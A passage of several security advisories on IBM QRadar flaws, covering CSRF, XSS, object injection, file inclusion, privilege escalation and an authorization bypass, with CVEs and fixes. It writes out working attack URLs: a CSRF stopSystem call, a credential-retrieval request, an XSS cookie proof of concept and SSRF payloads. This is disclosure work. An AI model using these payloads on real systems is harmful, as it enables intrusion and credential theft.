stored encrypted, however there is also a getDecrypted() method that
allows these values to be decrypted. Some passwords are reused for
different services, which also allows users to elevate their own
privileges. For example, the property jpa.connection.password is used
for connecting to PostgreSQL, but is also used as the password for the
ConfigServices account.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Apache Axis provides a SOAP implementation, services can be configured
in various ways. In case of QRadar the services are configured in the
server-config.wsdd file, located under WEB-INF. Three service classes
are currently configured:

- AdminService
- Version
- configservices

The first two are distributed with Axis, the latter one is custom for
QRadar. The AdminService allows for deploying and undeploying of
webservers, however it is configured to only be accessible from
localhost.

The implementation of the configservices webservice can be found in the
class com.q1labs.configservices.core.ConfigurationServices. Any public
method in this class can be called through Axis. The webservice is
mapped to the path /console/services/configservices. There are two ways
to call these methods:

- POST request containing a SOAP envelope. The first tag in the SOAP
body should have the same name as the method that needs to be invoked.
Method parameters are provided as child elements within this tag.
- GET request; the URL parameters are converted into a SOAP message by
Axis. The method is provided via the method URL parameter, its arguments
are provided as URL parameter with the same name  as the method
argument.

No measures have been implemented in Axis and/or QRadar to prevent
Cross-Site Request Forgery attacks against the webservices exposed by
Axis. Due to this it is possible for an attacker to call any exposed
service via Cross-Site Request Forgery. Methods that can be called
include:

- saveScannerConfigFile(data)
- addManagedHost(ipAddress, password, isTunneled, isCompressed, ipPublicAddress, natId, consoleIpToUse, runPrecheck, remappingip)
- startComponent/stopComponent/restartComponent(host, type, componentName)
- startComponents/stopComponents/restartComponents(host)
- startSystem/stopSystem/restartSystem()
- injectDeploymentModel/saveDeploymentModelToStaging(deploymentModel)
- deployStagingConfiguration(fullDeploy)
- restoreFromBackupDeployment()
- saveFile(fileName, data)

An attacker can create a URL that when visited by a logged in target
executes one or more of the exposed methods, for example:

https://<ip>/console/services/configservices?method=stopSystem

Besides the lack of Cross-Site Request Forgery protection, most methods
also lack proper access control checks. A handful of these methods
perform some form of access control, but most methods can be called by
any authenticated users. For example the saveFile() and retrieveFile()
methods check if the logged on user has permission to write or access
the requested file.

com.q1labs.configservices.core.ConfigurationServices:
public byte[] retrieveFile(String fileName, boolean staging) throws
ConfigServicesFault {
  try {
    if (!fileName.contains("/") && !fileName.contains("\\")) {
    String qradarUsername = this.requestSession.getQradarUsername();
    boolean canAccess = RequestSession.hasPermission(qradarUsername);
    if (!canAccess) {
      throw new UnauthorizedException("Provided username from security token does not have permission to use this method");
[...]

A logged on attacker can call all methods without proper access control.
One notable attack is to call the getNvaProperty() method. By calling
this method it is possible to retrieve any 'NVA' configuration setting -
including sensitive information like (encrypted) credentials.
Credentials are stored encrypted on disk, in some case they are stored
decrypted in memory. If the are already decrypted, getNvaProperty() will
return the plaintext value. If they are encrypted they can easily be
decrypted by calling the getDecrypted() method of the webservice.

Some passwords are reused for different services, which allows users to
elevate their own privileges. For example, the property
jpa.connection.password is used for connecting to PostgreSQL, but is
also used as the password for the ConfigServices account. A low
privileged user can request the password for the PostgreSQL user. Since
PostgreSQL is normally not exposed over the network it would still not
be possible to log in. However due to the password reuse it is possible
to use the same password to login as the ConfigService user.

https://<ip>/console/services/configservices?method=getNvaProperty&key=jpa.connection.password

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200403/cross-site-request-forgery-_-weak-access-control-in-qradar-configservices-webservice.html
[2] https://developer.ibm.com/qradar/ce/
[3] https://www.ibm.com/account/reg/us-en/signup?formid=urx-32552
[4] https://www.ibm.com/security/security-intelligence/qradar
[5] https://en.wikipedia.org/wiki/Security_information_and_event_management
[6] http://axis.apache.org/

------------------------------------------------------------------------
Reflected Cross-Site Scripting in QRadar Forensics link analysis page
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The QRadar Forensics PHP web application contains a page that is
vulnerable to reflected Cross-Site Scripting. This issue exist due to
the lack of encoding of the single-quote character and can be trigger
without authentication.

This vulnerability allows an attacker to perform a wide variety of
actions such as performing arbitrary actions on the victim's behalf or
presenting a fake login screen to collect usernames and passwords. In
order to exploit this issue, the attacker has to lure a victim into
opening a specially crafted link and pressing a key combination - making
a successful attack less likely. 

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [2]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM reports that QRadar 7.3.2 Patch 6 is not affected by this
vulnerability. In addtion, it is stated that thist issue is resolved in
QRadar Community Edition version 7.3.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [4] is IBM's enterprise SIEM [5] solution. A free version of
QRadar is available that is known as QRadar Community Edition [2]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar Forensics PHP web application contains a page that is
vulnerable to reflected Cross-Site Scripting. This issue exist due to
the lack of encoding of the single-quote character and can be trigger
without authentication.

This vulnerability allows an attacker to perform a wide variety of
actions such as performing arbitrary actions on the victim's behalf or
presenting a fake login screen to collect usernames and passwords. In
order to exploit this issue, the attacker has to lure a victim into
opening a specially crafted link and pressing a key combination - making
a successful attack less likely. 

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the LinkAnalysis.php page, located in
/opt/ibm/forensics/html/DejaVu/. The page accepts three request
parameters that are reflected in hidden input fields. Their values are
then used to open a new window to load the LinkAnalysisServlet Servlet.
The page itself appears to be old unused code, however it is still
exposed.

/opt/ibm/forensics/html/DejaVu/LinkAnalysis.php:
<?php

$solrQuery = htmlentities($_REQUEST['solrQuery']); // e.g., ID:*
$solrDocs = htmlentities($_REQUEST['solrDocs']); // e.g.,
case1-aljazeera_net2.pcap-0800278d2a7a-20080501224316017-1-2, et al.
$solrRows = htmlentities($_REQUEST['solrRows']); // e.g., 1024

$SERVER_NAME = $_SERVER['SERVER_NAME'];

$servletURL = 'http://' . $SERVER_NAME . ':8080/LinkAnalysisServlet';
$solrURL = 'http://' . $SERVER_NAME . ':8080/solr/documents';

print "
[...]
<input id='solrQuery' value='$solrQuery' hidden></input>
<input id='solrDocs' value='$solrDocs' hidden></input>
<input id='solrRows' value='$solrRows' hidden></input>
<script>
    var solrQuery = document.getElementById('solrQuery').value;
    var solrDocs = document.getElementById('solrDocs').value;
    var solrRows = document.getElementById('solrRows').value;

    window.onload = function() {
      window.open('$servletURL?solrURL=$solrURL&solrQuery='+solrQuery+'&solrDocs='+solrDocs+'&solrRows='+solrRows', '_self')
    }
</script>
[...]

The code above uses the htmlentities() [6] function to escape HTML
characters. The flag argument is not provided, meaning that
htmlentities() will not encode the single-quote character.

The values of the request parameters are reflected between single-quotes
and consequently it is possible to break out of the value attribute and
inject additional attributes in the hidden input field. It isn't
possible to inject other HTML tags as the greater-than and less-than
characters are encoded by htmlentities().

Exploiting Cross-Site Scripting vulnerabilities within hidden fields can
be a bit tricky. A method has been described by Gareth Heyes [7] in the
article XSS in hidden input fields [8]. Essentially it requires that the
victim is enticed to press a certain key combination. This behavior is
also browser [9] and OS dependent. As the attacker also needs to lure a
victim into opening a specially crafted link, exploiting this issue may
proof to be difficult.

This issue can be demonstrated using the proof of concept below. When
loading this URL in Firefox, the victim needs to press Alt+Shift+X
(Windows/Linux) or Ctrl+Alt+X (macOS).

https://<ip>/forensics/DejaVu/LinkAnalysis.php?solrQuery=%27%20accesskey=X%20onclick=%27alert(document.cookie)

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200404/reflected-cross-site-scripting-in-qradar-forensics-link-analysis-page.html
[2] https://developer.ibm.com/qradar/ce/
[3] https://www.ibm.com/account/reg/us-en/signup?formid=urx-32552
[4] https://www.ibm.com/security/security-intelligence/qradar
[5] https://en.wikipedia.org/wiki/Security_information_and_event_management
[6] https://www.php.net/manual/en/function.htmlentities.php
[7] https://twitter.com/garethheyes
[8] https://portswigger.net/blog/xss-in-hidden-input-fields
[9] https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/accesskey#Browser_compatibility

------------------------------------------------------------------------
Local privilege escalation in QRadar due to run-result-reader.sh
insecure file permissions
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the nobody user is owner of the run-result-reader.sh
script. This script is executed by the root user's crontab. Due to this
it is possible for any process running as nobody to add commands to this
script that will be executed with root privileges. In combination with a
code execution vulnerability in QRadar's web application, this can be
used for attacker's to gain full control of the QRadar system.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4270 [2]
6189657 [3] - IBM QRadar SIEM is vulnerable to privilege escalation
(CVE-2020-4270)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRader in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

A local privilege escalation vulnerability was found in QRadar. This
vulnerability is possible because the script located at
/opt/qvm/iem/bin/run-result-reader.sh is configured with weak file
permissions. The owner of the script is set to the nobody user, which is
a low privileged system account use by various services - including
QRadar's web application.

The script is also started by the root user's crontab. This means that
if an attacker manages to gain access to the QRadar system as the nobody
user, it would be possible to escalate privileges to root. This is for
example possible by exploiting a code execution vulnerability in
QRadar's web application.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The crontab of the root user contains various entries to run commands on
different moments. One of these entries will run the
run-result-reader.sh script every 20 minutes:

# crontab -l

[...]

# Update the Endpoint Manager Fixlet Action Results
*/20 * * * * /opt/qvm/iem/bin/run-result-reader.sh  > /var/log/iem-cron.log 2>&1

This script is owned by the nobody user, meaning that this user fully
controls the script and thus fully controls which commands will be
executed.

# ls -la /opt/qvm/iem/bin/run-result-reader.sh
-rwxr-xr-x 1 nobody nobody 2592 Sep 12 17:40
/opt/qvm/iem/bin/run-result-reader.sh

If the (modified) script is run from root's crontab, the commands within
the script will be executed with root privileges. Due to this it is
possible for the nobody to exploit this issue to gain root privileges
and gain full control of the QRadar system.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200405/local-privilege-escalation-in-qradar-due-to-run-result-reader_sh-insecure-file-permissions.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4270
[3] https://www.ibm.com/support/pages/node/6189657
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management

------------------------------------------------------------------------
PHP object injection vulnerability in QRadar Forensics web application
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP object injection vulnerability was found in the QRadar Forensics
web application. The vulnerability can be triggered via a specially
crafted cookie and can be used by an authenticated attacker to execute
arbitrary commands. The commands will be executed with the privileges of
the Apache system user.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4271 [2]
6189651 [3] - IBM QRadar SIEM is vulnerable to PHP object injection
(CVE-2020-4271)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRader in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

A PHP object injection vulnerability was found in the QRadar Forensics
web application. The vulnerability exists in the DataSetModel class and
can be triggered via a specially crafted cookie. By exploiting this
issue it is possible for authenticated users to instantiate arbitrary
PHP objects. It has been confirmed that a POP chain exists that can be
used to execute arbitrary commands. The commands will be executed with
the privileges of the Apache system user (generally the nobody user).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Forensics web application contains functionally to save graph data
in cookies. When a graph is viewed that was previously saved, the data
will be restored from the cookie value(s). Saving and restoring data is
done using PHP object serialization. The serialized data is compressed
and encoded with base64 before it is returned as cookie to the user.
Deserialization of graph cookies is done in the restore() method of the
DataSetModel as is shown in the code fragment below.

/opt/ibm/forensics/html/DejaVu/Reports/DataSetModel.php:
public function restore($dataKeys, $dsize) {
  if ($dsize == 0)
  // No data
    return null;

  $cookieData = '';
  foreach ($dataKeys as $dataKey) {
    if (array_key_exists($dataKey, $_COOKIE)) {
      $cookieData .= $_COOKIE[$dataKey];
      // All done, so delete the data cookie.
      setcookie($dataKey, "", time() - 3600);
    } else {
      error_log("MISSING COOKIE '$dataKey'");
      return null;
    }
  }

  $sz = strlen($cookieData);
  if ($sz != $dsize) {
    error_log("ERROR: Graph data size incorrect: expected $dsize, got $sz");
    return null;
  }

  try {
    $dataset = unserialize(gzuncompress(base64_decode($cookieData)));
    return $dataset;
  } catch (Exception $e) {
    error_log("Error deserializing session data: " . $e->getMessage());
    $dataset = null;
  }
  return null;
}

The restore() method is called in the constructor of various chart
classes, which all inherit from the BaseChart class. These chart classes
are exposed in the /forensics/graphs.php page of the Forensics web
application.

/opt/ibm/forensics/html/DejaVu/Charts.php:
abstract class BaseChart extends ParameterizedObject {
[...]
  public function __construct($params=null) {
[...]

        $dm = empty($dmodel) ? new DataSetModeler(null) : new $dmodel(null);
        if(array_key_exists('sid',$_GET))
            $dm->setSessID($_GET['sid']);

        $dataset = $dm->restore($dataKeys,$dsize);
[...]

It has been confirmed that this vulnerability can be used to execute
arbitrary commands by sending a specially crafted cookie to the affected
web page.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200406/php-object-injection-vulnerability-in-qradar-forensics-web-application.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4271
[3] https://www.ibm.com/support/pages/node/6189651
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management

------------------------------------------------------------------------
Arbitrary class instantiation & local file inclusion vulnerability in
QRadar Forensics web application
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the QRadar Forensics web application is vulnerable to
instantiation of arbitrary objects based on user-supplied input. An
authenticated attacker can abuse this to perform various types of
attacks including Server-Side Request Forgery and (potentially)
arbitrary execution of code.

In addition, the same input is also used to include PHP files, which can
be used to include arbitrary local files. By abusing the case upload
functionality, it is possible for an authenticated user to upload a PHP
file to a known location on the system. By exploiting the local file
inclusion vulnerability it is possible to run arbitrary PHP code. This
code will be executed with the privileges of the Apache system user
(generally the nobody user).

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4272 [2]
6189645 [3] - IBM QRadar SIEM is vulnerable to instantiation of
arbitrary objects (CVE-2020-4272)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRader in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar web application contains functionality to render various
graphs. The graph that needs to be rendered is based on user-supplied
request parameters. The correct graph and dataset classes are
dynamically loaded based on these parameters. No validation is performed
on the user-supplied parameters, allowing authenticated users to
instantiate arbitrary classes, which can be exploited to perform various
attacks including Server-Side Request Forgery and (potentially)
arbitrary execution of code via specially crafted Phar files [12].

In case a dataset class is provided that has not been declared (loaded)
yet. The code tries to include the correct PHP file in which the class
is defined. The file name of the include file is also based on the same
request parameter. Consequently, the web application is vulnerable to
local file inclusion.

If an attacker manages to place an arbitrary PHP file on the local
system, it is possible to abuse this issue to run arbitrary PHP code. It
was found that the case upload functionality allows uploading of PHP
files to a known location, thus allowing for the execution of arbitrary
PHP code. This code will be executed with the privileges of the Apache
system user (generally the nobody user).


------------------------------------------------------------------------
Details
------------------------------------------------------------------------
These issues are present in the graphs.php file. This PHP file accepts a
number of request parameters, including chart, dataset, and
output_image.

/opt/ibm/forensics/html/graphs.php:
$chart        = ( isset($_REQUEST['chart']) ?
htmlspecialchars($_REQUEST['chart']) : null );
$dataClass    = ( isset($_REQUEST['dataset']) ?
htmlspecialchars($_REQUEST['dataset']) : null );
$output_image = ( isset($_REQUEST['output_image']) ?
$_REQUEST['output_image'] : null );

If the output_image parameter is set to true, the PHP code will directly
try to instantiate an object with the name provided in the chart
parameter. One argument is passed to the constructor for which its value
is obtain from a request parameter with the same name as the selected
class name. If the class is successfully loaded, the drawChart() method
is called - regardless of whether this method actually exists.

/opt/ibm/forensics/html/graphs.php:
// Present the data
$cparams = $_REQUEST[$chart];
$cs = new $chart($cparams);
if($cs)
  $cs->drawChart();

No validation is performed on the user-supplied input, allowing for
authenticated attackers to instantiate practically any object in scope
of the page. In addition, the first argument that is passed to the
constructor is also controlled by the attacker.

What an attacker might do depends on the class that is instantiated and
the code that is executed by the constructor. A possible attack scenario
would be to perform a Server-Side Request Forgery attack by
instantiating a class that calls a method supporting one of the built-in
PHP wrappers [13].

Several classes exists in the Forensics code base, like the
DistribConfigHelper class. There are also built-in PHP classes that are
in scope and also allow for Server-Side Request Forgery, like the
SplFileObject [14] class. For example:

https://<ip>/forensics/graphs.php?chart=DistribConfigHelper&DistribConfigHelper=https://127.0.0.1/&output_image=1
https://<ip>/forensics/graphs.php?chart=SplFileObject&SplFileObject=https://127.0.0.1/&output_image=1
https://<ip>/forensics/graphs.php?chart=SplFileObject&SplFileObject=php://filter/read=string.toupper/resource=https://127.0.0.1/&output_image=1

Using the same PHP wrappers it is also possible to load arbitrary Phar
[15] files from the local machine. A known attack [12] (by Sam Thomas
[16]) exists where an attacker can trigger PHP objects to be
deserialized when a Phar file is loaded. Although code execution through
deserialization is possible in the Forensics application, exploiting
this issue is not that trivial. In particular, the attack can only be
executed from an object with a __wakeup() or __destruct() PHP magic
method [17]. The classes in scope of the vulnerable page don't appear to
have suitable magic methods that could be used to execute an exploit
(POP) chain.

Besides finding a suitable magic method, exploiting the Phar wrapper
also requires that the attacker can place a Phar file on the target
systems as Phar files can't be loaded from remote locations. It was
found that the case upload functionality allows uploading of files to a
known location. However, since the graph page also contains a local file
inclusion vulnerability, it makes more sense to target that
vulnerability instead.

The vulnerable code is executed in case the output_image request
parameter isn't present or is set to false. In this case the requested
class name is provided in the dataset request parameter. If this class
isn't (yet) in scope of the PHP page, an attempt is made to load it.
This is done by iterating though a list of predefined folder names, if a
file exists with the same name of the requested class, it will be
included after another which check is done to see if the class is in
scope.

/opt/ibm/forensics/html/graphs.php:
$haveDataClass = class_exists($dataClass);
if(!$haveDataClass) {
  foreach(array('', $DEJAVU_URL. 'Reports/','reports/') as $path) {
    $module = $path . $dataClass . ".php";
    if(file_exists($module)) {
    try {
      require_once($module);
      $haveDataClass = class_exists($dataClass);
      if($haveDataClass)
        break;
    } catch (Exception $e) {
      // Do nothing
      $msg = $e->getMessage();
    }
  }
}

As no validation is done on the class name, it is possible to include
files outside of these folder using path traversal. However this isn't
really needed as the first folder that is searched is empty, thus
allowing for absolute path names. In addition, it is also possible to
provide URL type paths. The call to file_exists() will block most PHP
wrappers. Some built-in wrappers will pass through the file_exists()
call, including the ftp:// [18] and ssh2.sftp:// [19] wrappers. In
theory, it should be able to include a file over (S)FTP were it not that
including files from remote locations has been disabled in the PHP
configuration.

/etc/php.ini:
; http://php.net/allow-url-include
allow_url_include = Off

Because it is possible to upload arbitrary files via the case upload
functionality, it is not that difficult to run arbitrary PHP code
regardless of these restrictions. Although other methods also exists, we
can just upload a PHP file to a known location and abuse this local file
inclusion vulnerability to execute the uploaded file.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200407/arbitrary-class-instantiation-_-local-file-inclusion-vulnerability-in-qradar-forensics-web-application.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4272
[3] https://www.ibm.com/support/pages/node/6189645
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management
[12] https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf
[13] https://www.php.net/manual/en/wrappers.php
[14] https://www.php.net/manual/en/splfileobject.construct.php
[15] https://www.php.net/manual/en/book.phar.php
[16] https://twitter.com/_s_n_t
[17] https://www.php.net/manual/en/language.oop5.magic.php
[18] https://www.php.net/manual/en/wrappers.ftp.php
[19] https://www.php.net/manual/en/wrappers.ssh2.php

------------------------------------------------------------------------
Authorization bypass in QRadar Forensics web application
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that any authenticated user can access & use the QRadar
Forensics web application, regardless whether they are granted
permission to use the Forensics application. This bypass only requires
that the user manually sets a cookie named QRIF with the same value as
the user's session cookie.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4274 [2]
6189705 [3] - IBM QRadar SIEM is vulenrable to Authorization bypass
(CVE-2020-4274)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRader in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar Forensics web application is normally only accessible for
users that are granted permission to use this application. A centralized
control that checks if the user has permission is implemented in an
include file that is included in most pages. This check can be bypassed
by sending a QRIF cookie to the application. If this cookie is present
and has the same value as the SEC cookie, the permission check is not
performed. Consequently, any authenticated user can access & use the
Forensics web application.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Most PHP pages of the Forensics application (directly or indirectly)
include the PHP file includes/functions.inc.php. A number of checks have
been implemented in this file, including a check to validate the user's
session, a check to detect Cross-Site Request Forgery attacks, and a
permission check to validate if the user has permission to use the
Forensics application. This last check is implemented in the LoginUser()
method of the QRadarHelper class.

/opt/ibm/forensics/html/DejaVu/qradar_helper.php:
public function LoginUser($sessionToken, &$errorInfo)
{
  global $s, $u, $QR_HELPER_CODES;
[...]
  $qrUserHasForensicsAccess = $this->GetQRuserHasForensics($qr_user_info['username']);

The call to LoginUser() is executed from the LoginCurrentUser() method,
which in turn is called form the functions.inc.php include file.

/opt/ibm/forensics/html/includes/functions.inc.php:
require_once('DejaVu/qradar_helper.php');

if (!isset($qrh))
{
  $qrh = new QRadarHelper();

[...]
  $errorMessage = "";
  $userLoggedIn = $qrh->LoginCurrentUser(true, $errorMessage);

Before the call to LoginUser() is made, the LoginCurrentUser() method
first checks if it has received a QRIF cookie. If the cookie is present
and it has the same value of the SEC cookie (the session cookie) the
